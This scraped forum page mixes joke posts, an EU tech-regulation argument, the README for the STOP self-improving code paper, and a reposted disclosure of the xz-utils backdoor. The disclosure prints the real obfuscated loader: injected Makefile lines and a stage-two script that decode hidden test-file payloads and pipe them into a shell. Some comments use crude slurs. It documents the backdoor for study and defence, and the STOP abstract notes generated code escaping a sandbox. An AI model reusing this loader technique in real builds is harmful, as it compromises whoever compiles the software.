
@lain @LinuxShill idk who else to ping but I'm starting to learn these things and she'd absolutely wipe the floor with me. She even mentions bloat, at this rate I wonder if she shitposts on /g/ in between making tutorials


source for that is https://www.theinformation.com/articles/how-amazons-big-bet-on-just-walk-out-stumbled, which I cannot bypass the paywall on :marseyshrug:

Pure, distilled, blue-meth autism vs. Something about Chinx and Linux

4chan explains it better

https://i.rdrama.net/images/1712087897028019.webp

!nooticers you need to nootice harder


Do we think Zuck paid for this article to counter his awkward UFC experience?

https://www.mensjournal.com/news/mark-zuckerberg-ufc-meme

https://media.giphy.com/media/zpl0jkntzFqZLXh235/giphy.webp

Me and who?

Self-Taught Optimizer (STOP): Recursively Self-Improving Code Generation

This is the repo for the paper: Self-Taught Optimizer (STOP): Recursively Self-Improving Code Generation

@article{zelikman2023self,
  title={Self-Taught Optimizer (STOP): Recursively Self-Improving Code Generation},
  author={Zelikman, Eric and Lorch, Eliana and Mackey, Lester and Kalai, Adam Tauman},
  journal={arXiv preprint arXiv:2310.02304},
  year={2023}
}

Abstract: Several recent advances in AI systems (e.g., Tree-of-Thoughts and Program-Aided Language Models) solve problems by providing a "scaffolding" program that structures multiple calls to language models to generate better outputs. A scaffolding program is written in a programming language such as Python. In this work, we use a language-model-infused scaffolding program to improve itself. We start with a seed "improver" that improves an input program according to a given utility function by querying a language model several times and returning the best solution. We then run this seed improver to improve itself. Across a small set of downstream tasks, the resulting improved improver generates programs with significantly better performance than its seed improver. Afterward, we analyze the variety of self-improvement strategies proposed by the language model, including beam search, genetic algorithms, and simulated annealing. Since the language models themselves are not altered, this is not full recursive self-improvement. Nonetheless, it demonstrates that a modern language model, GPT-4 in our proof-of-concept experiments, is capable of writing code that can call itself to improve itself. We critically consider concerns around the development of self-improving technologies and evaluate the frequency with which the generated code bypasses a sandbox.
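The seed-improver loop the abstract describes can be sketched in a few lines of Python. This is an illustration only, not the paper's code: `query_lm` is a stub standing in for the GPT-4 call, and every name here is invented for the sketch.

```python
# Minimal sketch of the "seed improver" described in the abstract.
# query_lm stands in for the language-model (GPT-4) call; all names
# are illustrative, not the paper's actual API.

def query_lm(prompt, n=3):
    """Stub for a language-model call that proposes candidate programs.
    Returns trivial string variants so the sketch is runnable."""
    return [prompt + f"\n# candidate {i}" for i in range(n)]

def seed_improver(program, utility, n_candidates=3):
    """Ask the model for several improved versions; keep the best by utility."""
    candidates = query_lm(program, n=n_candidates)
    candidates.append(program)  # never return something worse than the input
    return max(candidates, key=utility)

# The recursive step: feed seed_improver its own source code as `program`,
# with a utility that scores how well the resulting improver improves programs.
# The language model itself is never altered, matching the paper's caveat.
```

The self-improvement strategies the abstract lists (beam search, genetic algorithms, simulated annealing) are things the model proposed as replacements for this greedy `max` when asked to improve the improver.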


:marseysnoo:

https://old.reddit.com/r/groomercordapp/comments/1brxqrp/groomercord_to_start_showing_ads_for_g*mers_to_boost/?sort=controversial

https://old.reddit.com/r/technology/comments/1brxt4u/groomercord_to_start_showing_ads_for_g*mers_to_boost/?sort=controversial

:marseymouse:

https://lemmy.world/post/13762503?scrollToComments=true


archive


Linked xeet https://twitter.com/illyism/status/1774425117117788223

Every time you share a @GIPHY, you send your data to:

checks notes

816 partners 🤯🤯🤯


EU just ruins things because they can't build anything.

AI tools often aren't available here because of obscure laws. ChatGPT was blocked for a month. Gemini is not available right now. A disaster.

Bureaucrats want to show that they exist.

To my knowledge they've never been "blocked". Google simply didn't release them in the EU for a while.

By delaying something with stupid regulations, they effectively block it.

Personally I don't want to drink polluted water, eat unsanitary food, live in a place where all housing is owned by a handful of entities that engage in price-fixing, work 80 hours a week in an environment where the response to mass worker suicides is to install suicide nets, have my privacy violated by private corporations (foreign or domestic), or have my insurance rates tripled by some opaque discriminatory AI, but you do you in whatever dystopian future you dream of.

You're just a low life europoor communist.


The EU just wants to kill tech, because its ever-changing nature means they can't control it.


Quite the opposite: in the EU there is no innovation, because only big tech can comply with the regulation.


EU is just hurting its own startups.

The USA, India, China: they all have multibillion-dollar AI companies. The EU doesn't, because nobody wants to deal with unpredictable lawmakers.

Edit: @dang came and mopped up, RIP _giorgio_

Edit 2: actually _giorgio_ didn't get banned :marseymindblown:

Backdoors

I wanna be a janny :marseyjanny2:

Too soon

Palestinian lives matter


Palestinian lives matter


@X explain your country

Palestinian lives matter


https://mastodon.social/@AndresFreundTec/112180083704606941

https://i.rdrama.net/images/17118260510016828.webp

linuxbros.. how will we recover?? i think its time to admit that windows is superior


People are throwing around accusations of compromised github accounts left and right :marseyschizowall: !codecels get in here and start accusing people of being bad actors :marseyglow2:


https://i.rdrama.net/images/1711789965756554.webp

The recently-enacted European Digital Services Act (DSA) gives the Dublin-based body substantial enforcement powers over social media and video platforms in the area of policing illegal and hateful content.

The Irish regulator has been seeking to recruit trusted flaggers on three-year terms, with specific conditions and rules against conflicts of interest attached. It says that while experience in reporting hateful and illegal content is an advantage, it's not a pre-requisite.

“Approved Trusted Flaggers will have a fast lane when reporting suspected illegal content, where online platforms will be legally obliged to give their notices priority, and to process and decide on these reports without undue delay,” the regulator says on its ‘flaggers' application form.

Areas to be policed include illegal speech such as discrimination and hate speech, non-consensual behaviour, online bullying and “negative effects on civic discourse or elections”. It also includes scams, offences to minors, sexual-based abuse, incitement to self-harm and other topics.


:#marseymanysuchcases:


== Compromised Release Tarball ==

One portion of the backdoor is solely in the distributed tarballs. For easier reference, here's a link to debian's import of the tarball, but it is also present in the tarballs for 5.6.0 and 5.6.1:

https://salsa.debian.org/debian/xz-utils/-/blob/debian/unstable/m4/build-to-host.m4?ref_type=heads#L63

That line is not in the upstream source of build-to-host, nor is build-to-host used by xz in git. However, it is present in the tarballs released upstream, except for the "source code" links, which I think github generates directly from the repository contents:

https://github.com/tukaani-project/xz/releases/tag/v5.6.0

https://github.com/tukaani-project/xz/releases/tag/v5.6.1

This injects an obfuscated script to be executed at the end of configure. This script is fairly obfuscated and uses data from "test" .xz files in the repository. This script is executed and, if some preconditions match, modifies $builddir/src/liblzma/Makefile to contain

am__test = bad-3-corrupt_lzma2.xz
...
am__test_dir=$(top_srcdir)/tests/files/$(am__test)
...
sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1

which ends up as

...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr " -_" " _-" | xz -d | /bin/bash >/dev/null 2>&1; ...
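The `tr` stage here is worth pausing on: it is a plain byte-for-byte substitution that turns the deliberately "corrupt" test file back into a valid xz stream. A toy illustration of the trick, with made-up data, swapping only `-` and `_`:

```shell
# Illustrative only: swap '_' and '-' in both directions, the same
# single-byte substitution trick used to "repair" bad-3-corrupt_lzma2.xz
# before piping it into xz -d. A '-' at the start or end of a tr set
# is treated literally, so no escaping is needed.
echo 'bad_3_corrupt-lzma2' | tr '_-' '-_'
# prints: bad-3-corrupt_lzma2
```

Because the damage is a reversible byte swap, the file passes for corrupted test data in the repository while remaining one `tr` away from executable content.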

Leaving out the "| bash" that produces

####Hello####

#��Z�.hj�

eval grep ^srcdir= config.status
if test -f ../../config.status;then
eval grep ^srcdir= ../../config.status
srcdir="../../$srcdir"
fi

export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh

####World####

After de-obfuscation this leads to the attached injected.txt.
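The long `export i=...` pipeline above is just a chunk extractor: it alternately discards 1024 bytes and keeps 2048 (724 on the final keep), reassembling a payload that was interleaved with junk inside the good-large_compressed.lzma test file. A rough Python equivalent, with synthetic data and the round count left as a parameter rather than counted out of the quoted script:

```python
# Rough Python equivalent of the $i pipeline: alternately skip `skip` bytes
# and keep `keep` bytes of a stream, with a shorter final keep, reassembling
# a payload interleaved with filler. Chunk sizes mirror the quoted script;
# the data and round count here are synthetic.
import io

def extract_interleaved(stream, rounds, skip=1024, keep=2048, last_keep=724):
    out = bytearray()
    for i in range(rounds):
        stream.read(skip)  # (head -c +1024 >/dev/null): discard filler
        n = keep if i < rounds - 1 else last_keep
        out += stream.read(n)  # head -c +2048 (or +724 on the last round)
    return bytes(out)

# Synthetic stream: filler/payload/filler/payload.
blob = b"J" * 1024 + b"A" * 2048 + b"J" * 1024 + b"B" * 724
payload = extract_interleaved(io.BytesIO(blob), rounds=2)
```

In the real attack the reassembled bytes then go through the `tr` byte remap and a raw lzma1 decode before reaching `/bin/sh`, as shown in the quoted pipeline.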

== Compromised Repository ==

The files containing the bulk of the exploit are in an obfuscated form in

tests/files/bad-3-corrupt_lzma2.xz
tests/files/good-large_compressed.lzma

committed upstream. They were initially added in

https://github.com/tukaani-project/xz/commit/cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0

Note that the files were not even used for any "tests" in 5.6.0.

Subsequently the injected code (more about that below) caused valgrind errors and crashes in some configurations, due to the stack layout differing from what the backdoor was expecting. These issues were attempted to be worked around in 5.6.1:

https://github.com/tukaani-project/xz/commit/e5faaebbcf02ea880cfc56edc702d4f7298788ad

https://github.com/tukaani-project/xz/commit/72d2933bfae514e0dbb123488e9f1eb7cf64175f

https://github.com/tukaani-project/xz/commit/82ecc538193b380a21622aea02b0ba078e7ade92

For which the exploit code was then adjusted:

https://github.com/tukaani-project/xz/commit/6e636819e8f070330d835fce46289a3ff72a7b89

Given the activity over several weeks, the committer is either directly involved or there was some quite severe compromise of their system. Unfortunately the latter looks like the less likely explanation, given they communicated on various lists about the "fixes" mentioned above.

!chuds !nonchuds CHECK YO SELF. YEAR OF THE LINUX DESKTOP 2024 :marseysal:

NYC creates AI chatbot to help people understand NY law and it immediately starts telling people to break the law

Great thread from Kathryn Tewson about how rslurred this thing is

Based AI telling employer to take worker's tips lmao

https://i.rdrama.net/images/17117284401529386.webp
